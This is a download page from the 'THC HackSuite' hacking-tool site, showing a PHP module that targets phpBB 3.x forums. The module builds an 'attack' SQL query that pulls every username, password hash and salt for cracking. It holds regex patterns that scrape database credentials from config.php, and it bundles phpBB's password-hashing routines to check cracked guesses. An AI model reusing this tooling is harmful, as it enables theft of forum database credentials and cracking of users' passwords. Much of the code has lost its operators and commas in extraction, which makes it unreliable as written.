random gallery image
random tutorial
preview

..different index page for the suite. It's very easy because the only thing you need to do is change the content of default.php. I don't want to create something like hello world or..

read more

random other
xConverter

THC xConverter is a tool that makes use of (php) functions in order to calculate, fetch, convert and encrypt data

more about this module
more of this category
more modules

HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.
<?php
/* phpBB */
$_PROPERTIES = array();
$_PROPERTIES['name'] = "phpBB";
$_PROPERTIES['version'] = "3.x";
$_PROPERTIES['usernamefield'] = "username";
$_PROPERTIES['emailfield'] = "user_email";
$_PROPERTIES['saltfield'] = "user_form_salt";
$_PROPERTIES['hashfield'] = "user_password";
$_PROPERTIES['tablename'] = "users";
$_PROPERTIES['tableprefix'] = "phpbb_";
$_PROPERTIES['filename'] = "phpbb/phpbba.php";
// use post variables instead if values are different from default
if(isset($_POST['iUseDefault']) && $_POST['iUseDefault']==0){
    
$_PROPERTIES['usernamefield'] = @mysql_real_escape_string($_POST['sUserNameField']);
    
$_PROPERTIES['emailfield'] = @mysql_real_escape_string($_POST['sEmailField']);
    
$_PROPERTIES['hashfield'] = @mysql_real_escape_string($_POST['sHashField']);
    
$_PROPERTIES['tablename'] = @mysql_real_escape_string($_POST['sTableName']);
    
$_PROPERTIES['tableprefix'] = @mysql_real_escape_string($_POST['sTablePrefix']);
}
$_PROPERTIES['queryraw'] = array();
$_PROPERTIES['queryraw']['attack'] = "SELECT ".$_PROPERTIES['usernamefield']." AS crackuser,".$_PROPERTIES['hashfield']." AS crackpass".(isset($_PROPERTIES['saltfield']) ? ",".$_PROPERTIES['saltfield']." AS crackhash" "")." FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename'];
$_PROPERTIES['queryraw']['getemail'] = "SELECT ".$_PROPERTIES['emailfield']." AS temail FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."='/user/'";
if(isset(
$_GET['JSON'])){
    
session_cache_limiter('nocache');
    
header('Expires: '.gmdate('r',0));
    
header('Content-type: application/json');
    echo 
json_encode($_PROPERTIES);
}
else{
    if(!
function_exists("phpbb_hash")){
    
/**
    *
    * @version Version 0.1 / slightly modified for phpBB 3.0.x (using $H$ as hash type identifier)
    *
    * Portable PHP password hashing framework.
    *
    * Written by Solar Designer <solar at openwall.com> in 2004-2006 and placed in
    * the public domain.
    *
    * There's absolutely no warranty.
    *
    * The homepage URL for this framework is:
    *
    *    http://www.openwall.com/phpass/
    *
    * Please be sure to update the Version line if you edit this file in any way.
    * It is suggested that you leave the main version number intact, but indicate
    * your project name (after the slash) and add your own revision information.
    *
    * Please do not change the "private" password hashing method implemented in
    * here, thereby making your hashes incompatible.  However, if you must, please
    * change the hash type identifier (the "$P$") to something different.
    *
    * Obviously, since this code is in the public domain, the above are not
    * requirements (there can be none), but merely suggestions.
    *
    *
    * Hash the password
    */
    
function phpbb_hash($password)
    {
        
$itoa64 './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
    
        
$random_state unique_id();
        
$random '';
        
$count 6;
    
        if ((
$fh = @fopen('/dev/urandom''rb')))
        {
            
$random fread($fh$count);
            
fclose($fh);
        }
    
        if (
strlen($random) < $count)
        {
            
$random '';
    
            for (
$i 0$i $count$i += 16)
            {
                
$random_state md5(unique_id() . $random_state);
                
$random .= pack('H*'md5($random_state));
            }
            
$random substr($random0$count);
        }
    
        
$hash _hash_crypt_private($password_hash_gensalt_private($random$itoa64), $itoa64);
    
        if (
strlen($hash) == 34)
        {
            return 
$hash;
        }
    
        return 
md5($password);
    }
    
    
/**
    * Check for correct password
    *
    * @param string $password The password in plain text
    * @param string $hash The stored password hash
    *
    * @return bool Returns true if the password is correct, false if not.
    */
    
function phpbb_check_hash($password$hash)
    {
        
$itoa64 './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
        if (
strlen($hash) == 34)
        {
            return (
_hash_crypt_private($password$hash$itoa64) === $hash) ? true false;
        }
    
        return (
md5($password) === $hash) ? true false;
    }
    
    
/**
    * Generate salt for hash generation
    */
    
function _hash_gensalt_private($input, &$itoa64$iteration_count_log2 6)
    {
        if (
$iteration_count_log2 || $iteration_count_log2 31)
        {
            
$iteration_count_log2 8;
        }
    
        
$output '$H$';
        
$output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 3), 30)];
        
$output .= _hash_encode64($input6$itoa64);
    
        return 
$output;
    }
    
    
/**
    * Encode hash
    */
    
function _hash_encode64($input$count, &$itoa64)
    {
        
$output '';
        
$i 0;
    
        do
        {
            
$value ord($input[$i++]);
            
$output .= $itoa64[$value 0x3f];
    
            if (
$i $count)
            {
                
$value |= ord($input[$i]) << 8;
            }
    
            
$output .= $itoa64[($value >> 6) & 0x3f];
    
            if (
$i++ >= $count)
            {
                break;
            }
    
            if (
$i $count)
            {
                
$value |= ord($input[$i]) << 16;
            }
    
            
$output .= $itoa64[($value >> 12) & 0x3f];
    
            if (
$i++ >= $count)
            {
                break;
            }
    
            
$output .= $itoa64[($value >> 18) & 0x3f];
        }
        while (
$i $count);
    
        return 
$output;
    }
    
    
/**
    * The crypt function/replacement
    */
    
function _hash_crypt_private($password$setting, &$itoa64)
    {
        
$output '*';
    
        
// Check for correct hash
        
if (substr($setting03) != '$H$' && substr($setting03) != '$P$')
        {
            return 
$output;
        }
    
        
$count_log2 strpos($itoa64$setting[3]);
    
        if (
$count_log2 || $count_log2 30)
        {
            return 
$output;
        }
    
        
$count << $count_log2;
        
$salt substr($setting48);
    
        if (
strlen($salt) != 8)
        {
            return 
$output;
        }
    
        
/**
        * We're kind of forced to use MD5 here since it's the only
        * cryptographic primitive available in all versions of PHP
        * currently in use.  To implement our own low-level crypto
        * in PHP would result in much worse performance and
        * consequently in lower iteration counts and hashes that are
        * quicker to crack (by non-PHP code).
        */
        
if (PHP_VERSION >= 5)
        {
            
$hash md5($salt $passwordtrue);
            do
            {
                
$hash md5($hash $passwordtrue);
            }
            while (--
$count);
        }
        else
        {
            
$hash pack('H*'md5($salt $password));
            do
            {
                
$hash pack('H*'md5($hash $password));
            }
            while (--
$count);
        }
    
        
$output substr($setting012);
        
$output .= _hash_encode64($hash16$itoa64);
    
        return 
$output;
    }
    }
}
$_SYSTEM = array();
$_SYSTEM['name'] = $_PROPERTIES['name'];
$_SYSTEM['version'] = $_PROPERTIES['version'];
$_SYSTEM['patterns'] = array();
$_SYSTEM['patterns']['user'] = '/\$dbuser\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['password'] = '/\$dbpasswd\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['host'] = '/\$dbhost\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['database'] = '/\$dbname\s+=\s+\'(.*)?\'/';
$_SYSTEM['file'] = "config.php";
?>
powered by
site stats
cms statistics:
version: 0.6.0
downloads: 3836
native: 26
modules: 21
apps: 2
support development
It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.